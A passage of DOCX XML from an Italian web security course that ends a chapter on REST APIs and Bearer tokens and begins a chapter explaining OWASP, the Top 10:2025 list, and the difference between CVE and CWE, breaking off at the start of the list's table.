        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">token Bearer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nell’header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. I token sono biglietti al portatore: vanno protetti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strumenti per testare:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(terminale, scriptabile) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">REST Client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(estensione VS Code, file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Postman</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lo incontrerai nel mondo del lavoro, è un’evoluzione professionale degli stessi concetti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai esteso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MiniBlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un’API REST parallela a quella HTML: stesso database, due interfacce. È il modello tipico delle applicazioni reali oggi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le API hanno vulnerabilità specifiche:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BOLA/IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), Broken Authentication (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), Excessive Data Exposure, Mass Assignment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10: la lista degli errori più comuni.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Adesso che hai un modello mentale completo (HTML, sessioni, API, JSON, token), vediamo qual è la classifica mondiale delle vulnerabilità più diffuse e perché OWASP è il riferimento di fatto per chiunque lavori in sicurezza applicativa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="176"/>
    <w:bookmarkEnd w:id="177"/>
    <w:bookmarkStart w:id="205" w:name="X463a9931b945686237640ec155573727474abd4"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="ch_4"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 4 — OWASP Top 10: la classifica delle vulnerabilità più diffuse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Capitoli 1, 2, 3 e 3-bis. Devi avere il modello mentale di un’applicazione web (richieste, risposte, sessioni, API, JSON) per poter capire cosa significano i nomi delle vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esistono migliaia di tipi diversi di vulnerabilità nel software. Trattarli tutti, anche solo nominandoli, sarebbe inutile. Per questo motivo, da oltre vent’anni, c’è una piccola classifica di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dieci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">voci che ha conquistato lo status di standard de facto in tutto il mondo: la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La conoscono i programmatori, i security manager, i revisori normativi, gli auditor di certificazione, i responsabili acquisti delle grandi aziende. Quando in un colloquio di lavoro nel mondo dello sviluppo qualcuno ti chiederà</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">conosci la OWASP Top 10?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dovrai poter rispondere di sì, dirne almeno quattro o cinque a memoria, e saperne spiegare almeno una in dettaglio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo capitolo ti dà la mappa: chi è OWASP, cos’è la Top 10, quali sono le 10 voci dell’edizione attuale (2025), come si misura la gravità di una vulnerabilità (CVE e CVSS), e quali voci tratteremo a fondo nei prossimi capitoli del corso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="178" w:name="cosè-owasp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="486" w:name="sec_4_1"/>
      <w:r>
        <w:t xml:space="preserve">4.1 Cos’è OWASP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sta per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Open Worldwide Application Security Project</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in passato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Open Web Application Security Project</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). È una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fondazione no-profit internazionale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, nata nel 2001 negli Stati Uniti, con una missione precisa: rendere la sicurezza del software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">visibile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alle aziende e alle persone, in modo che possano prendere decisioni informate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP non vende software, non fa consulenza, non ha azionisti. Vive di donazioni, sponsorizzazioni e di una rete mondiale di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">capitoli locali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(chapter) e migliaia di volontari — per la maggior parte sviluppatori, ricercatori di sicurezza e accademici. L’Italia ha capitoli attivi a Milano, Roma, Catania, Torino e altrove.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quello che OWASP produce è materiale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pubblico, gratuito, scaricabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Documenti di riferimento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: linee guida, standard, checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Software open source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: scanner di vulnerabilità (ZAP), librerie sicure (ESAPI), framework di test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1082"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Eventi e conferenze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la Global AppSec Conference è il principale evento mondiale del settore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il documento più famoso di OWASP è la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Perché OWASP è uno standard di fatto.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il GDPR, la NIS 2, il Cyber Resilience Act, il PCI DSS (lo standard per chi gestisce carte di credito), la ISO 27001, i framework NIST: nessuno di questi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">cita testualmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la OWASP Top 10. Ma tutti, di fatto, la richiamano: quando una norma chiede</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">misure tecniche adeguate al rischio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e gli auditor devono valutare se l’azienda è in regola, la prima domanda è quasi sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">come gestite la OWASP Top 10?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È diventata il vocabolario condiviso con cui regulator, sviluppatori, manager e legali parlano di sicurezza applicativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="178"/>
    <w:bookmarkStart w:id="180" w:name="la-top-10-nel-tempo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="487" w:name="sec_4_2"/>
      <w:r>
        <w:t xml:space="preserve">4.2 La Top 10 nel tempo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La OWASP Top 10 è una classifica delle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dieci categorie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di vulnerabilità più critiche per le applicazioni web. Viene aggiornata ogni 3-4 anni. Le edizioni pubblicate finora sono state:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2003 · 2004 · 2007 · 2010 · 2013 · 2017 · 2021 · 2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quest’ultima edizione, la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10:2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, è stata annunciata alla Global AppSec Conference di Washington DC il 6 novembre 2025 ed è quella attualmente in vigore. È la versione che useremo in tutto il corso. Chi cita la 2021 — versione precedente — non è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sbagliato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma sta usando informazioni di quattro anni fa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="179" w:name="come-si-compila-la-classifica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come si compila la classifica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP mette a punto la Top 10 con un metodo dichiarato e trasparente. Per la 2025 sono state usate due fonti complementari:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dati raccolti dalla comunità.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aziende di sicurezza, fornitori di tool, organizzazioni di tutto il mondo donano statistiche anonime sui risultati dei loro scanner. Per la 2025 sono stati analizzati i dati di oltre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">175.000 vulnerabilità reali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CVE) registrate fra il 2021 e il 2024 e i loro identificatori CWE associati (vedremo cos’è un CWE). Da questi dati emerge la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">frequenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con cui ciascuna categoria di vulnerabilità è stata trovata nelle applicazioni testate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Survey della comunità.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Otto delle dieci categorie vengono dai dati.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Due</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vengono dal sondaggio aperto a chi lavora sul campo, perché alcuni problemi nuovi sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">già visti dai professionisti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ma non ancora catturati dagli strumenti automatici di test. Un esempio della 2025: la categoria A10 (Mishandling of Exceptional Conditions) è entrata grazie al survey.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il risultato è una lista che combina rilevanza statistica e percezione esperta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ℹ️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CWE: cosa è.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Common Weakness Enumeration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è un altro elenco standardizzato, mantenuto da MITRE, che cataloga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tipi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di debolezza nel software. Ce ne sono oltre 900. Esempi: CWE-89 (SQL Injection), CWE-79 (XSS), CWE-22 (Path Traversal). Mentre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identifica una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">specifica vulnerabilità in un software specifico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(es. CVE-2021-44228 = Log4Shell),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identifica la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">categoria di errore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ha causato quella vulnerabilità. La OWASP Top 10 raggruppa i CWE in 10 categorie macro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="179"/>
    <w:bookmarkEnd w:id="180"/>
    <w:bookmarkStart w:id="182" w:name="la-owasp-top-102025"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="488" w:name="sec_4_3"/>
      <w:r>
        <w:t xml:space="preserve">4.3 La OWASP Top 10:2025</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Eccola. Imparala a memoria nei prossimi mesi: ti seguirà per tutta la carriera.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Codice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Categoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Italianizzazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A01:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Controllo degli accessi rotto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A02:2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
